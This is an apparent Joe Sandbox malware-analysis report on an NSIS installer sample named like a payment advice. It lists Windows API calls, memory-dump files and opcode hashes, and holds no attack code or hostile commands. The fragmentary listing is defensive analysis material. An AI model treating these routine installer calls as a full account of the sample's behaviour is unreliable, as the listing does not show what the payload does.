                                                                                                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9D
                                                                                                                                          • wsprintfW.USER32 ref: 00402CD1
                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00402CE1
                                                                                                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF3
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                          • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                                          • API String ID: 1451636040-1158693248
                                                                                                                                          • Opcode ID: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
                                                                                                                                          • Instruction ID: 78b67de6d16717a489960d5e53e23e1f77e1f7f38f635152e8b2699b13fa448d
                                                                                                                                          • Opcode Fuzzy Hash: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
                                                                                                                                          • Instruction Fuzzy Hash: EAF06270504108ABEF205F50CD4ABAE3768BB00309F00803AFA16B91D0CBF95959DF59
                                                                                                                                          APIs
                                                                                                                                          • GetTickCount.KERNEL32 ref: 00403192
                                                                                                                                            • Part of subcall function 0040330F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                                                                                                          • SetFilePointer.KERNEL32(00000000,00000000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000), ref: 004031C5
                                                                                                                                          • WriteFile.KERNEL32(0040BE78,?,00000000,00000000,00413E78,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?), ref: 0040327F
                                                                                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00413E78,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E), ref: 004032D1
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: File$Pointer$CountTickWrite
                                                                                                                                          • String ID: x>A
                                                                                                                                          • API String ID: 2146148272-3854404225
                                                                                                                                          • Opcode ID: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                                                                                                                                          • Instruction ID: e2b2982e6b1d623d5d036838b7619e310c478df2cbc778b1b7af49cc7c53be0d
                                                                                                                                          • Opcode Fuzzy Hash: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                                                                                                                                          • Instruction Fuzzy Hash: 2A41AC72504201DFDB10AF29ED848A63BACFB54315720827FE910B22E0D7799D81DBED
                                                                                                                                          APIs
                                                                                                                                          • CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403332,00436800,75923420,00403512), ref: 004061E1
                                                                                                                                          • CharNextW.USER32(?,?,?,00000000), ref: 004061F0
                                                                                                                                          • CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403332,00436800,75923420,00403512), ref: 004061F5
                                                                                                                                          • CharPrevW.USER32(?,?,00436800,00436800,00000000,00403332,00436800,75923420,00403512), ref: 00406208
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Char$Next$Prev
                                                                                                                                          • String ID: *?|<>/":
                                                                                                                                          • API String ID: 589700163-165019052
                                                                                                                                          • Opcode ID: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                                                                                                                                          • Instruction ID: e0619f79a043cffb4c3b00824a243f33de9385cd0f0c41224b0956f888f04927
                                                                                                                                          • Opcode Fuzzy Hash: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                                                                                                                                          • Instruction Fuzzy Hash: 3511C47680021295EB307B548C40BB762F8EF957A0F56403FE996B72C2E77C5C9282BD
                                                                                                                                          APIs
                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,?,0040A580,000000FF,00409D80,00000400,?,?,00000021), ref: 0040252F
                                                                                                                                          • lstrlenA.KERNEL32(00409D80,?,?,0040A580,000000FF,00409D80,00000400,?,?,00000021), ref: 00402536
                                                                                                                                          • WriteFile.KERNEL32(00000000,?,00409D80,00000000,?,?,00000000,00000011), ref: 00402568
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ByteCharFileMultiWideWritelstrlen
                                                                                                                                          • String ID: 8
                                                                                                                                          • API String ID: 1453599865-4194326291
                                                                                                                                          • Opcode ID: 9598e7bf0115d7b54bac2ba601592103c37d762dad4affe4391b543117dffca7
                                                                                                                                          • Instruction ID: b6741c74acf97665735c623be1ff62c12e58b25bca11cb73faf7774dd427f28f
                                                                                                                                          • Opcode Fuzzy Hash: 9598e7bf0115d7b54bac2ba601592103c37d762dad4affe4391b543117dffca7
                                                                                                                                          • Instruction Fuzzy Hash: A5019671A44204FBD700AFA0DE49EAF7278AB50319F20053BF102B61D2D7BC5D41DA2D
                                                                                                                                          APIs
                                                                                                                                          • lstrcatW.KERNEL32(00000000,00000000,00409580,00435000,?,?,00000031), ref: 00401793
                                                                                                                                          • CompareFileTime.KERNEL32(-00000014,?,00409580,00409580,00000000,00000000,00409580,00435000,?,?,00000031), ref: 004017B8
                                                                                                                                            • Part of subcall function 00405EEA: lstrcpynW.KERNEL32(?,?,00000400,004033C8,004281E0,NSIS Error), ref: 00405EF7
                                                                                                                                            • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                                                                            • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                                                                            • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                                                                            • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                                                                            • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                                                                            • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                                                                            • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1941528284-0
                                                                                                                                          • Opcode ID: f5fb99fc77cb499af78de08433a29d52c657005603a562d7fa302922f95013b5
                                                                                                                                          • Instruction ID: bc5e94bc6114b027384bbb583ab77f55914405742357509a7a45d2f14902e26b
                                                                                                                                          • Opcode Fuzzy Hash: f5fb99fc77cb499af78de08433a29d52c657005603a562d7fa302922f95013b5
                                                                                                                                          • Instruction Fuzzy Hash: 0541A071900515BACF10BBB5CC46DAF7A78EF05368B20863BF521B11E2D73C8A419A6E
                                                                                                                                          APIs
                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B9B
                                                                                                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                                                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Close$DeleteEnumOpen
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1912718029-0
                                                                                                                                          • Opcode ID: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
                                                                                                                                          • Instruction ID: ada95b61e8ad34ac3bb2ad29be3e5f3f7733698153a8948b25f67961a2a4c07b
                                                                                                                                          • Opcode Fuzzy Hash: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
                                                                                                                                          • Instruction Fuzzy Hash: 2E113D7190400CFEEF21AF90DE89DAE3B79EB54348F10447AFA05B10A0D3759E51EA69
                                                                                                                                          APIs
                                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                                                                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                                                                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00401D36
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1849352358-0
                                                                                                                                          • Opcode ID: 548b7988845d34974c7096401ec02f3577b62e53f99ad47469e6fcf51543f742
                                                                                                                                          • Instruction ID: 62a37a396924b9b833916b179176740e0848b2f5cedec3081aefe4e9105dc113
                                                                                                                                          • Opcode Fuzzy Hash: 548b7988845d34974c7096401ec02f3577b62e53f99ad47469e6fcf51543f742
                                                                                                                                          • Instruction Fuzzy Hash: F0F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08305B104466F601F5190C674AD018B35
                                                                                                                                          APIs
                                                                                                                                          • GetDC.USER32(?), ref: 00401D44
                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                                                                                                          • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                                                                                                          • CreateFontIndirectW.GDI32(0040BD88), ref: 00401DBC
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3808545654-0
                                                                                                                                          • Opcode ID: 6de236fac86f4cc62a0a7bf8fa179f1b370f6b686e9a3dedb6aaee9d500d3606
                                                                                                                                          • Instruction ID: 3b80acf522b7bf2f021413e8febbbf72b8f641a50adb0d53ac9f1aa9edf06097
                                                                                                                                          • Opcode Fuzzy Hash: 6de236fac86f4cc62a0a7bf8fa179f1b370f6b686e9a3dedb6aaee9d500d3606
                                                                                                                                          • Instruction Fuzzy Hash: DF01D131948280AFEB016BB0AE0BB9ABF74DF95301F144479F245B62E2C77914049F7E
                                                                                                                                          APIs
                                                                                                                                          • SetFilePointer.KERNEL32(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000,00409230,?), ref: 00403088
                                                                                                                                          • WriteFile.KERNEL32(00000000,00413E78,?,000000FF,00000000,00413E78,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403115
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: File$PointerWrite
                                                                                                                                          • String ID: x>A
                                                                                                                                          • API String ID: 539440098-3854404225
                                                                                                                                          • Opcode ID: b27c88111c9479bfc016d655c0b2bfb1ccfb1f1bf46317cd24110ceb5cc412c0
                                                                                                                                          • Instruction ID: dc2c699ff297b31fb9e84695071232237a0836a1395088a2783af72dccbdbb3b
                                                                                                                                          • Opcode Fuzzy Hash: b27c88111c9479bfc016d655c0b2bfb1ccfb1f1bf46317cd24110ceb5cc412c0
                                                                                                                                          • Instruction Fuzzy Hash: A8312871500219EBDF10CF65EC44AAA3FBCEB08755F20813AF905AA1A0D3349E50DBA9
                                                                                                                                          APIs
                                                                                                                                          • lstrlenW.KERNEL32(004226D0,004226D0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A09
                                                                                                                                          • wsprintfW.USER32 ref: 00404A12
                                                                                                                                          • SetDlgItemTextW.USER32(?,004226D0), ref: 00404A25
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                                                                                          • String ID: %u.%u%s%s
                                                                                                                                          • API String ID: 3540041739-3551169577
                                                                                                                                          • Opcode ID: a87d65089fa2b22b88f3ea6921d71f9a407986b65cfb91be1df2eb5324c2a4fc
                                                                                                                                          • Instruction ID: 6b2e2e184c3c611d12d6b53aa9198873543b26f6782fca7c8cbe4a2e3a07221a
                                                                                                                                          • Opcode Fuzzy Hash: a87d65089fa2b22b88f3ea6921d71f9a407986b65cfb91be1df2eb5324c2a4fc
                                                                                                                                          • Instruction Fuzzy Hash: 1411E2736001243BCB10A66D9C45EEF368D9BC6334F180637FA29F61D1DA799C2186EC
                                                                                                                                          APIs
                                                                                                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                                                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: MessageSend$Timeout
                                                                                                                                          • String ID: !
                                                                                                                                          • API String ID: 1777923405-2657877971
                                                                                                                                          • Opcode ID: 5e1f230eecded0db815b532ef795033685ed3b5cfc855201c3a552c7fdd4c815
                                                                                                                                          • Instruction ID: 3450dd174e4bd499bd5dd80d9ee349d4783428bbf063aee010979b0fef1ae38f
                                                                                                                                          • Opcode Fuzzy Hash: 5e1f230eecded0db815b532ef795033685ed3b5cfc855201c3a552c7fdd4c815
                                                                                                                                          • Instruction Fuzzy Hash: D8217471A44109BEEF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18
                                                                                                                                          APIs
                                                                                                                                          • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
                                                                                                                                          • lstrlenW.KERNEL32(0040A580,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
                                                                                                                                          • RegSetValueExW.ADVAPI32(?,?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CloseCreateValuelstrlen
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1356686001-0
                                                                                                                                          • Opcode ID: a8bbc55d30affaabc6cd86b2271235a8e32791a35e6a6594074806b6736fc700
                                                                                                                                          • Instruction ID: 3600ae87f41ed0761c30afac485ceb57641edc98565fd21ac0e2bbddf966c716
                                                                                                                                          • Opcode Fuzzy Hash: a8bbc55d30affaabc6cd86b2271235a8e32791a35e6a6594074806b6736fc700
                                                                                                                                          • Instruction Fuzzy Hash: 511160B1A00108BEEB10AFA4DD49EAFBB7CEB50358F10443AF905B61D1D7B85D419B69
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 004059E0: CharNextW.USER32(?,?,00424ED8,?,00405A54,00424ED8,00424ED8,00436800,?,75922EE0,00405792,?,00436800,75922EE0,00434000), ref: 004059EE
                                                                                                                                            • Part of subcall function 004059E0: CharNextW.USER32(00000000), ref: 004059F3
                                                                                                                                            • Part of subcall function 004059E0: CharNextW.USER32(00000000), ref: 00405A0B
                                                                                                                                          • CreateDirectoryW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                                                                                                          • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                                                                                                          • GetFileAttributesW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,00435000,?,00000000,000000F0), ref: 00401630
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3751793516-0
                                                                                                                                          • Opcode ID: ab4beae8261b44de63f604e0a73f5b1755ddd155d8cc8e63c414e47e0b3a8ad9
                                                                                                                                          • Instruction ID: 793db7a5d63411832aed35bcc9698a3b838560232fc9f0aff2bd133e4d1ca9b1
                                                                                                                                          • Opcode Fuzzy Hash: ab4beae8261b44de63f604e0a73f5b1755ddd155d8cc8e63c414e47e0b3a8ad9
                                                                                                                                          • Instruction Fuzzy Hash: 8E11C271904100EBDF206FA0CD449AF7AB4FF14369B34463BF882B62E1D23D4941DA6E
                                                                                                                                          APIs
                                                                                                                                          • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                                                                                                                          • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                                                                                                          • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                                                                                                            • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1404258612-0
                                                                                                                                          • Opcode ID: 0759821644e88925b44a7e9fb1563554894f113fe06b33f49c2a0c28299a5465
                                                                                                                                          • Instruction ID: 0d64a3d5d22a86ce83a9b45ae5cd800923300da454a86426803db7941f711343
                                                                                                                                          • Opcode Fuzzy Hash: 0759821644e88925b44a7e9fb1563554894f113fe06b33f49c2a0c28299a5465
                                                                                                                                          • Instruction Fuzzy Hash: 76113675A00208AFDB00DFA5C945DAEBBB9EF04344F20407AF905F62A1D7349E50CB68
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                                                                            • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                                                                            • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                                                                            • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                                                                            • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                                                                            • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
